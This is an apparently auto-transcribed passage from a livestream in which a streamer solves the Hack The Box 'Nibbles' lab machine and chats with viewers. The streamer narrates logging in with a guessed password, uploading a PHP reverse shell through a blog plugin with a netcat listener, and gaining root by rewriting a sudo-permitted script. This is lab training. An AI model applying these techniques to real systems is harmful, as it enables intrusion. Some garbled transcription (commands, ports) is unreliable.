about subdomains. We might have to start looking at subdomains for this one. Matter of fact, we're gonna try a little trick here. Nano / Etsy / hosts. We're going to paste this IP address here. Oh, that's not what to do. This IP address. And then we want to call this, what's the name of this machine? Nibble, Nibble, is that the name of the machine? Nibbles. Let's say if we can go to Nibbles, no, http nibbles.hackthebox. Are there 2 B's in that? Yeah. Alright, well, Rockspace is not doing nothing. We gotta find... do I got subroot built into this? No. Sublister in here? AMAS? We need to do some subdomain searching. Let's look. There's a lot of vulnerabilities for Apache, but we get this almost every stream and we waste a lot of time on it. Let's see here. OpenSSH 7.2, that seems like a newer version, so I'm not, maybe not, but I need to do a bug binding recon video one day. Nice. I mainly watch what Nahomsec does. Yeah, he's got a good YouTube channel. Well, we need to... This is a Metasploit module for this one. What am I listening to right now? What just happened? I did not get off of the... Somehow I got into someone else's playlist. That was not supposed to happen. Hopefully I don't get a copyright strike for that. I don't know how it jumped from one playlist to the next playlist. I should not have done that. Oh, because it... I listened to that for a half hour. I hope I don't get a copyright strike for that. I'll be very upset. Why does it go? I should just be playing random songs out of this. Why is YouTube doing me dirty like this? Alright, well, that's fine. Guys, I'll be back. I gotta get another Mountain Dew, man. I need more hacker fuel, so I will be right back. I need more caffeine. Hackersploit's got some good content too. Hackersploit, he did the EJPT course, and I learned a lot from him. Stretching my legs. That's why I avoid background music for now. Well, this is royalty-free, copyright-free music that I normally play, but the playlist got to the bottom, and then it just went to someone else's stuff. So, hopefully I don't get a copyright strike. If not, I'll have to cut out a half hour out of the video. And the people who watch these streams after the fact, the past recording, didn't know how to miss that 30 minutes, which sucks. What's up, Tuji? Am I saying that right? Thanks for stopping in. Glad to see you here. Yeah, I watched John Hammond. Yeah, I mean, I watch pretty much all the big YouTubers. He's really a genius person. Yeah, honestly, he is. That guy's on another level, dude. I don't do many CTS. I prefer real-world based trainings. Yeah, I mean, well, I think CTS are good exercises. Honestly, I really do. Is it hard for a new person to get a job in pen testing in 2024? Yes, it is. 100% is right now. It's a bad job market right now. Is today's Nmap's birthday? Look, happy 27th birthday to Nmap. May it live to 127. That's great. Cybersecurity in general, yeah, it's hard. It's a hard job market right now, unfortunately. I do think it's going to change when the economy gets better. The economy is in bad shape. In the U.S. market. Now, if you're in Europe, now that's actually the opposite. Europe, from my understanding, if you're in Europe, the jobs are good. I see job postings for Europe all the time, and I'm like, oh my gosh, Europe is hiring. So if you're in Europe, you have the opposite problem right now. You should be able to find something a lot easier than the U.S. market right now. But I guess it depends on what European country you're in. But I've seen a lot in the UK. I've seen a lot of UK jobs being posted. A lot of ghost jobs in USA. Yeah, it's really awful. Ghost jobs should be illegal. They should be illegal. companies should get punished for posting a job that they don't fill. There should be a strict rule that if you post a job and you don't fill it, you have to pay a fine, a significant hefty fine, if you don't fill it within a certain amount of time, unless you interview a lot. Like if you have a job and you interview, let's say you do like, I don't know, 100 interviews. I'm like, all right, well, we tried, you know, and that should be the standard. Like if you post a job and you don't do 100 interviews and you don't fill it, you should get fined. If you do 100 interviews, like, all right, well, maybe there's no one out there for you. But if you just post a job and you don't bring anybody in for an interview, it should be completely 100% illegal. It's like a water hole attack. Yeah, exactly. It's exactly what it is. I don't even know what we were doing. I got my Mountain Dew and I got on a ramble. Ghost chops make me upset. I don't really know what to do, man. There's not a whole lot of information on this box, dude. Let's try to find subdomains, maybe. I don't know. Let's try to find subdomains. I don't know why subdomains is one of the harder things for me to do. Subdomain finder. Capture the server request. Oh, yeah, we can do that. Let's just look at the source. Oh, look at that. Nibble blog directory. Nothing interesting here. Good thing we checked the source. You told me to check the requests and burp, but we didn't even need burp to find that. But let's do, well, crap. Let's copy and paste this. Nibble blog directory. Nothing interesting here. Go down. There's nothing down. There's nothing below this line. Nibbles, yum yum. There are no posts. Alrighty. Well, let's try this now. Go back to Fur Rocks here. Was I running Fur Rocks here? Alright, let's see here. There are no posts. Uncategorized music videos. Hello world. Home. Powered by Nibble blog. Let's see if there's Nibble blog vulnerabilities. I don't. Latest Nibble blog vulnerabilities. Nibble blog file upload vulnerability. That's what we need. It's a Metasploit. There's a Metasploit module for this. Nibble blog file upload. Let's just try that. MSF console. It's worth a shot. Especially if it has an excellent rating. Like, I have no problem just firing an excellent rating Metasploit module. Metasploit modules at targets, because excellent ratings mean they're safe. It means they shouldn't take down a server. So let's do MSF. No, I already did that. Use this module here. Oh, we typed in use twice. Options. Password. I don't know the password. The password to authenticate with. I don't know that. Well, that doesn't help me out then, does it? Okay, well, if we can get a password, then we'll be set. So let's keep looking. Maybe let's look at the source code of this. I keep putting F12. I don't like that. Let's do view page source. Uncategorized. Music. Videos. Have I solved Ghost? Did I solve Ghost? I think I did, man. Oh gosh. That was a while ago. Was that season 5? Alright, back. I haven't been playing in season 6, guys. I kinda quit with the seasons. I thought it was more beneficial for me to stream. Retired. Did I do? No, I didn't do Ghost. Yeah, I didn't do Ghost. That was the. That's why I don't remember it. The last Insane Machine I did was Magic Gardens, and Mist. I remember Mist. Rough. That one. Look at that. That was rough. That took like an entire week. That took all week, dude. that took a team of people helping me too. Have you checked admin.php? Well, I was running the Ferox Buster. There's tons of stuff here. There is an admin. There's a directory listen. There is a /admin. There's a lot here. Oh my gosh. I wish. Oh my. Let's just get a /admin. Well, that was easy. We're already in the admin directory. No, let's see here. Views. User. Forgot bit. What's up, Lethal Dude? Welcome to the stream. Thanks for stopping in. Glad to see you here. A gluten for pain. Yeah, that's literally any machine, any insane machine. Which is kind of the reason why I stopped doing seasons, because I couldn't handle it no more. It took a lot of time. Whereas an easy box, like I can stream it here, I can do 2 in 1 in like 4 hours. Whereas an insane machine, like you're spending all week on that box. Username that bit. I don't even know what I'm looking at here. Comments, settings. Grep. I'm trying to find something. No password there. Go back. This is a Nibbles block file upload vulnerability. There's a write-up for this box, but we're not going to read the write-up yet. There's another write-up for this box. There's a shell upload. It's like, do we need a password for this? When uploading image files via the My Image plugin, which is delivered with Nibbles by default. Obtain admin credentials. Alright, well, so we're stopping. We gotta find some admin credentials somewhere, guys. How do I do that? Is there an admin.php for this? There is a Nibbles blog. Nibbles blog default creds. These are all without Metasploit. Alright, well. These are all Nibbles write-ups for this machine. I don't want them. I just want the default creds to this. Nibbles blog. If I knew the default username and password, I could try that, but I don't know what. Well, let's just try admin. Nope. Let's do admin password. Let's do root password. Let's do root root. There's got to be a default credentials. I don't want to. How to install and configure it? This isn't a. Welcome to Nibble blog. Did I not do admin? I thought I did admin. Well, we can try to brute force admin. I was just kind of hoping I could get some close. Provide your username and password. Admin.php. Alright, well, here's the thing. How do we know? I don't think cool's gonna work here though, unfortunately. Blacklist protection. Alright. There's not enough information on the blog to have cool work. You know what I mean? Blacklist protection? Did I break this box? Nibbles up. Huh? I can't get a Nibbles. Why is it blacklist protection? Security error? It was working. Admin.php. What? How did that break? How did I... Just because I hit forgot password? Bro, what the heck? It was working just a second ago. Now the whole thing's broken? Alright, well, I'm just gonna revert the machine, I guess. Have you checked the config.yaml? I have not, but that'd be a good place to check. config.bit. Oh, that's interesting. Themes note 2, config.bit, config.bit. There's so much here to check. I hate when there's so much to check. It's like, man, you get overwhelmed with information. It's like, why do you... Thanks, FireDogSec. I appreciate it. Yeah, if you're watching, enjoying the content, yeah, I would appreciate it. A like and a subscribe would help the channel out tremendously. See your admin plugins. This machine's still booting up. Alright, how much time we got left? We got a half hour left. Yeah, I do have to offset. Water advertises my stream better than I do. Yeah, Hack the Mock sessions every Sunday at this time. Noon Eastern time, that's 9 a.m. Pacific time. Admin Nibbles. It's worth a shot. Oh, I gotta change my Etsy host. Nano/Etsy/hosts. Alright, let's try that again. That's the right password. Nibbles is the right password. So now I think we can just use Metasploit here. Or do we want to do it without Metasploit? Let's do it without Metasploit. Shell upload. Yeah, here we go. We did find this one earlier. Shell upload. Attain admin credentials. We get it already. Activate my image plugin by visiting. Alright. We just gotta upload a... Oh, that did not work. Alright, well, where did it tell me to go? Local... Oh. Nibble blog, admin.php. That's why it didn't work, because I did localhost. Duh. Let's try that. Alright. So it's telling me activate my image plugin by visiting here and then upload a PHP shell. To where? Wait, hold on. Activate my image plugin. Where's my images? My images. Show a picture. Configure. Is it not already enabled? Position 4. It already looks like it's enabled to me. Upload PHP shell, ignore warnings. Image.php. This is the default name of the images upload via the plugin. Code? They gave me the code and everything, bro? Images. Let's do, we're gonna open up a new terminal here. So we can't do this as root. Let's do change directory, downloads, nano, image.php. And I guess we just upload that. Choose file. Go to my downloads. Where's my image.php? Save changes. Ignore warnings. Okay. Now we just got to. Now we just gotta navigate to here. That's not. Should be a web shell, right? Well, we uploaded successfully, but this doesn't look like a web shell to me. Do I need to do? That worked. This is what I put there, so that makes sense. Honestly, I'm not sure how to get this to work, but I do know we can use pentest monkey for PHP reverse shell. If we just do that, I think this will just work. So let's grab the pentest monkey PHP reverse shell. I'm assuming this will work. So let's. Oh, maybe I can just do like $CMD equals who am I? Maybe that's what I gotta do. Who am I? No, that didn't work. That's okay. I'm not sure what this code's doing. I'm not sure how to use this code. It didn't really give really good instructions on that. But I do know that if the upload was successful for sure. So let's go back. We will choose an image. But before that, we got to go to here. Let's go to my downloads. Nano hack.php. Paste the pentest monkey code. We'll scroll all the way up and put our IP address and port up here. And then this should just run and give us a reverse shell. In theory. So my IP address is 10.10.16.29 and my port 143. Control X, Y, enter. Clear netcat dash. No, let's do. Back to my root emulator here. Let's open up a new tab. netcat-lnvp 443. We're going to listen on 443 and we're going to choose a file and we're going to upload hack.php and we're going to save changes. And we got that. So now we got to go back here and we need to navigate to hack.php. Let's go ahead and duplicate this. /hack.php. Not found. What? That's weird. How's it not found when it worked earlier? Oh, I'm doing something wrong here. Hold on. Content private plugins image.php. Did they get deleted? I'm confused, guys. I think it got wiped. I think Hack2Box does that where there's like scripts that are clean. So let's try that again. Save changes. Because it was just working. Huh? How is this not working all of a sudden? It just worked. Image PHP. Choose file. Image PHP. Save changes. What? How's this not working, bro? It just worked. I'm confused on that one, guys. Visit. This is the default page of images via the plugin. Yeah, well, it's not there no more somehow. Got wiped out clean. What just happened, bro? Oh, there it goes. Must have messed something up. Hack.php maybe? Not found. Upload files. So how is image PHP here, but not hack PHP? Well, let's just try this then. Let's go back to yeah, it's mind blowing to me how that. What the heck, man? This box is very unstable. It's broken. What? Oh my gosh. Alright, well, let's just duplicate this. I don't understand why that's not working. I was trying to do a Google search for that. What? Bro, what is this box doing? Oh, that's why. I gotta get rid of this. There we go. Alright. Latest post, my images, configure, position. I don't know what that means. Hack.php, save changes. How is that not found? That doesn't make any sense to me, bro. Oh, I got a reverse shell. We had a reverse shell this whole time. It's saying not found, but it worked. That's really weird, but I'm not gonna be mad about it. Who am I? We are Nibbler! There's no such thing as... I couldn't believe it said not found, but then it worked. Isn't that weird? That's weird. So just because you got not found doesn't mean it doesn't work. I was like, no one. I was like, it should be there. How is this not working? And you kept saying not found, not found, not found, not found, but it really worked. That's funny. I was getting frustrated there. I was like, this is making sense. Why is this not working? It worked. It just gave me an error when I was expecting something else. Yeah, I know. I'm trying to stabilize it right now. Let me just get my commands here, my shell stabilization commands. Change directory home ls cat user.txt. There's a user flag, baby. Woohoo! Copy selection. I would say that this flag was very easy. So we got a personal.zip. That's interesting. So, can I? I gotta get. Can I do unzip personal.zip? Change directory, personal directory, stuff. Change directory, stuff. Cat monitor.sh. Oh gosh. Let's do sudo -l. I don't need a password to run personal stuff monitor.sh, so I can run anything inside of here without a password. So that's easy. All we have to do is modify this. Can I nano personal? Oh no, not nano. Can I have nano monitor.sh? Bro, I don't care about any of this. I'm just going to delete this whole file and replace it with a malicious version. So we will do a very, very simple reverse shell here. 29. Control X, Y, enter. Alright, so now let's just do split terminal horizontally. Zoom in on this. And then we will do sudo monitor.sh. But before that, we need to do netcat-lmvp/3 and run that. Password for Nibbler. It said I didn't need a password. I think I need to do the whole thing. Sudo -l. We got to specify this is an entire thing. My terminal's being all weird, but that should work. It worked! Yes! This is very confusing, but it worked. Look at that, baby. cat/root/txt. No. root.txt. Easy. That was one of the easiest root flags ever. This is an easy box. That was super fast. That was a piece of cake for the privilege escalation. That was easy. That was probably one of the fastest ones I ever done. Please do without Metasploit if you can. I'm glad I did. Yeah, I'm gonna try my best. So my first few streams I was using Metasploit. I'm like, yeah, this is boring. So I try to avoid Metasploit where possible. His notes should be on GitHub. Whose notes? Oh yeah, I do have my GitHub notes. It's not all my notes, but it's the majority of my notes. I can't share my offsec notes, my OSEP notes. I can't share those, unfortunately. OffSec takes it very seriously. Let's go to walkthrough, and let's read a walkthrough. That was fun. We didn't need any help for that, and we got that done stupid fast. So we found that, yeah. This is just tells you how to do Metasploit. Yeah, that was easy. I mean, we did this intended way, but we didn't. We did it without Metasploit. They used Metasploit here in the walkthrough, but we did not use Metasploit. We got our information from Nibbleblaw 4.0.3 shell upload from PacketStorm. It took a little extra work there, but it would have been faster if we would have used Metasploit. But I mean, still, it was pretty easy to and I used it. I don't know what this code's doing. I don't know what this means, but using the pentest monkey reverse shell worked really well. The only thing that hung me up was the fact that it was giving me this not found. I was like, what do you mean hack.php is not found? Like, I uploaded it and then it worked in the background. So that's what we learned today in this session. Just because it says not found doesn't mean your reverse shell didn't work. So if you get a not found, check your reverse shell anyways, because you might have got a shell. So that's a big lesson here. That was super easy. It was fun. It was a good stream. I had a hunch it was easy because there was so many write-ups on it. You know what I mean? I mean, look at all these write-ups that people did. There's a lot of people writing up about this, and there's a lot of write-ups for that one. When you see a hack the box machine with a lot of write-ups, it's an easy machine. Like, pretty. I mean, it says easy, obviously, but it's not all easy machines are the same difficulty. There's some easy machines that are like, okay, this is kind of hard. This is like almost a medium here. You know what I mean? But that's it. That's the box. Hopefully you guys learned something. I learned a lot today. Thanks for watching, guys. Thanks for hanging out. We don't have any time left for another box, unfortunately. I try to keep these under 4 hours. So we can't do a third machine, but we did get 2 done. That's my goal. I'd like to get 3 on the next one of these days, but if you are not already following the channel, make sure you hit follow, hit subscribe, and then yeah, just check out some of my other content on YouTube. Check out my podcast, The Hacker's Cache. It's on YouTube, it's on Spotify, it's on Apple Podcasts, and any other podcast app for that matter. So check out my podcast, check out my YouTube channel. I got some hacking and cybersecurity related content on my YouTube channel. And yeah, if you're not already subscribed to the YouTube channel, do me a favor, hit subscribe. Would really appreciate it. Thanks for hanging out, guys. You guys are awesome, and I'll see you next stream next Sunday, noon Eastern time. That's 12 p.m. Eastern time, and that is 9 a.m. Pacific time. Every single Sunday, more Hack the Box. And hopefully I see you there. Until then, peace out, take care, have a good one. Kyser, out.